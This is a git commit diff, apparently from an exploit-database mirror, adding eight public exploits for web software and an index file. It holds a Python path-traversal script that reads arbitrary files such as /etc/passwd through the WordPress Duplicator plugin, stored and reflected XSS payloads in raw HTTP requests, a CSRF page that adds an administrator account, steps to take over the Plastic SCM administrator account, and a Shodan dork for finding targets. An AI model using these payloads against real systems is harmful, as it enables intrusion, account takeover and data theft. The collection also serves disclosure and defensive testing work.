DB: 2021-10-19

8 changes to exploits/shellcodes Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS) Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS) Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS) Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF) Plastic SCM 10.0.16.5622 - WebAdmin Server Access
2021-10-19 05:02:14 +00:00 · 2021-10-19 05:02:14 +00:00 · 0a3e0862c8
commit 0a3e0862c8
parent a7f5a62613
9 changed files with 345 additions and 0 deletions
--- a/exploits/multiple/webapps/50426.txt
+++ b/exploits/multiple/webapps/50426.txt
@ -0,0 +1,21 @@
+# Exploit Title: Plastic SCM 10.0.16.5622 - WebAdmin Server Access
+# Shodan Dork: title:"Plastic SCM"
+# Date: 18.10.2021
+# Exploit Author: Basavaraj Banakar
+# Vendor Homepage: https://www.plasticscm.com/
+# Software Link: https://www.plasticscm.com/download/releasenotes/10.0.16.5622
+# Version: Plastic SCM < 10.0.16.5622
+# Tested on: Chrome,Firefox,Edge
+# CVE : CVE-2021-41382
+
+# Reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468
+
+# Exploit:
+
+1. Navigate to target.com/account [This holds administrator login console]
+
+2. Change URL to target.com/account/register [Here able to set new password for the adminstrator user]
+
+3. Now after changing password of administrator and login to console and Navigate to target.com/configuration/authentication and set an new password for any of the users
+
+4. Now navigate to target.com/webui/repos and login with the recently changed password for user i.e is in step 3
--- a/exploits/php/webapps/50419.txt
+++ b/exploits/php/webapps/50419.txt
@ -0,0 +1,19 @@
+# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
+# Date: 16/10/2021
+# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
+# Vendor Homepage: https://board.support/
+# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
+# Version: 3.3.4
+# Tested on: Ubuntu 20.04.2 LTS, Windows 10
+
+POST /supportboard/include/ajax.php HTTP/1.1
+Cookie: [Agent+]
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 808
+X-Requested-With: XMLHttpRequest
+Connection: close
+
+function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false
--- a/exploits/php/webapps/50420.py
+++ b/exploits/php/webapps/50420.py
@ -0,0 +1,24 @@
+# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
+# Date: October 16, 2021
+# Exploit Author: nam3lum
+# Vendor Homepage: https://wordpress.org/plugins/duplicator/
+# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
+# Version: 1.3.26
+# Tested on: Ubuntu 16.04
+# CVE : CVE-2020-11738
+
+import requests as re
+import sys
+
+if len(sys.argv) != 3:
+        print("Exploit made by nam3lum.")
+        print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
+        exit()
+
+arg = sys.argv[1]
+file = sys.argv[2]
+
+URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
+
+output = re.get(url = URL)
+print(output.text)
--- a/exploits/php/webapps/50421.txt
+++ b/exploits/php/webapps/50421.txt
@ -0,0 +1,72 @@
+# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
+# Date: 17-10-2021
+# Exploit Author: Aniket Deshmane
+# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
+# Version: 1
+# Tested on: Windows 10,XAMPP
+
+Steps to Reproduce:
+1)Navigate to http://127.0.0.1/employment_application & Login with staff account .
+2) Navigate to vacancies tab
+3) Click on Add new .
+4)Add Payload
+"><img src=x onerror=alert(1)>
+
+in Vacancy Title field.
+
+5)Click on Save and you are done. It's gonna be triggered when anyone
+visits the application.
+
+Request:-
+
+POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------15502044322641666722659366422
+Content-Length: 931
+Origin: http://127.0.0.1
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Cache-Control: no-transform
+
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="title"
+
+"><img src=x onerror=alert(1)>
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="designation_id"
+
+1
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="slots"
+
+1
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------15502044322641666722659366422--
--- a/exploits/php/webapps/50422.txt
+++ b/exploits/php/webapps/50422.txt
@ -0,0 +1,41 @@
+# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
+# Date: 2021-17-10
+# Exploit Author: Hamit CİBO
+# Vendor Homepage: https://www.inea.si
+# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
+# Version: ME RTU
+# Tested on: Windows
+# CVE : CVE-2018-16060
+
+
+# PoC
+# Request
+
+GET /web HTTP/1.1
+Host: **.**.**.***
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
+x64; Trident/5.0)
+Connection: close
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 08 Aug 2018 08:09:53 GMT
+Server: Apache/2.4.7 (Ubuntu)
+Content-Location: web.tar
+Vary: negotiate
+TCN: choice
+Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT
+ETag: "93800-5083300f58d00;51179459a2c00"
+Accept-Ranges: bytes
+Content-Length: 604160
+Connection: close
+Content-Type: application/x-tar
+
+
+Reference :
+
+https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH
--- a/exploits/php/webapps/50423.txt
+++ b/exploits/php/webapps/50423.txt
@ -0,0 +1,57 @@
+# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
+# Date: 2021-17-10
+# Exploit Author: Hamit CİBO
+# Vendor Homepage: https://www.inea.si
+# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
+# Version: ME RTU
+# Tested on: Windows
+# CVE : CVE-2018-16061
+
+
+# PoC
+# Request
+
+POST
+/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%
+3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1
+Host: **.**.**.***
+Content-Length: 132
+Cache-Control: max-age=0
+Origin: http://**.**.**.***
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/68.0.3440.84
+Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://**.**.**.***sss/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7
+Connection: close
+
+submitted=1&username=--
+%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw
+ord=&Submit=Login
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 08 Aug 2018 08:14:25 GMT
+Server: Apache/2.4.7 (Ubuntu)
+X-Powered-By: PHP/5.5.9-1ubuntu4
+Vary: Accept-Encoding
+Content-Length: 3573
+Connection: close
+Content-Type: text/html
+
+<div id='fg_membersite' class='login_form'>
+<form id='login' name='login'
+action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8'
+method='post' accept-charset='UTF-8'>
+
+
+Reference :
+
+https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view
--- a/exploits/php/webapps/50424.txt
+++ b/exploits/php/webapps/50424.txt
@ -0,0 +1,75 @@
+# Exploit Title: Company's Recruitment Management System 1.0 -  'description' Stored Cross-Site Scripting (XSS)
+# Date: 18-10-2021
+# Exploit Author: Aniket Anil Deshmane
+# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
+# Version: 1
+# Tested on: Windows 10,XAMPP
+
+Step to reproduce:-
+1)Login with staff account & Navigate to  Vacancies tab.
+
+2)Click on add new vacancies .Put any random information  on other field except description & go to the description window .
+
+3)In the description field  select insert  link .
+
+5) In Text to display the field add the following payload .
+
+"><img src=x onerror=alert(1)>
+
+*6)Click on save & you are done.It's gonna be triggered when some one open
+vacancies details  *
+
+Request:-
+
+POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)
+Gecko/20100101 Firefox/93.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------156186133432167175201476666002
+Content-Length: 1012
+Origin: http://127.0.0.1
+DNT: 1
+Connection: close
+Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
+Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------156186133432167175201476666002
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------156186133432167175201476666002
+Content-Disposition: form-data; name="title"
+
+Test1ee
+-----------------------------156186133432167175201476666002
+Content-Disposition: form-data; name="designation_id"
+
+4
+-----------------------------156186133432167175201476666002
+Content-Disposition: form-data; name="slots"
+
+1
+-----------------------------156186133432167175201476666002
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------156186133432167175201476666002
+Content-Disposition: form-data; name="description"
+
+<p><br><a href="http://google.com" target="_blank">"><img src="x"
+onerror="alert(1)"></a></p>
+-----------------------------156186133432167175201476666002
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------156186133432167175201476666002--
--- a/exploits/php/webapps/50425.txt
+++ b/exploits/php/webapps/50425.txt
@ -0,0 +1,28 @@
+# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
+# Date: 18-10-2021
+# Exploit Author: Aniket Anil Deshmane
+# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
+# Version: 1
+# Tested on: Windows 10,XAMPP
+
+Detail:
+The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.
+
+CSRF POC:-
+
+
+<html>
+<!-- CSRF PoC - generated by Burp Suite Professional -->
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"
+method="POST">
+<input type="hidden" name="id" value="" />
+<input type="hidden" name="fullname" value="Test" />
+<input type="hidden" name="username" value="Test" />
+<input type="hidden" name="type" value="1" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44365,3 +44365,11 @@ id,file,description,date,author,type,platform,port
 50413,exploits/multiple/webapps/50413.txt,"Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)",1970-01-01,"Mert Daş",webapps,multiple,
 50414,exploits/hardware/webapps/50414.txt,"Sonicwall SonicOS 7.0 - Host Header Injection",1970-01-01,Ramikan,webapps,hardware,
 50418,exploits/php/webapps/50418.txt,"i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)",1970-01-01,"Forster Chiu",webapps,php,
+50419,exploits/php/webapps/50419.txt,"Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)",1970-01-01,"John Jefferson Li",webapps,php,
+50420,exploits/php/webapps/50420.py,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read",1970-01-01,nam3lum,webapps,php,
+50421,exploits/php/webapps/50421.txt,"Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aniket Deshmane",webapps,php,
+50422,exploits/php/webapps/50422.txt,"Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure",1970-01-01,"Hamit CİBO",webapps,php,
+50423,exploits/php/webapps/50423.txt,"Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Hamit CİBO",webapps,php,
+50424,exploits/php/webapps/50424.txt,"Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aniket Deshmane",webapps,php,
+50425,exploits/php/webapps/50425.txt,"Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)",1970-01-01,"Aniket Deshmane",webapps,php,
+50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",1970-01-01,"Basavaraj Banakar",webapps,multiple,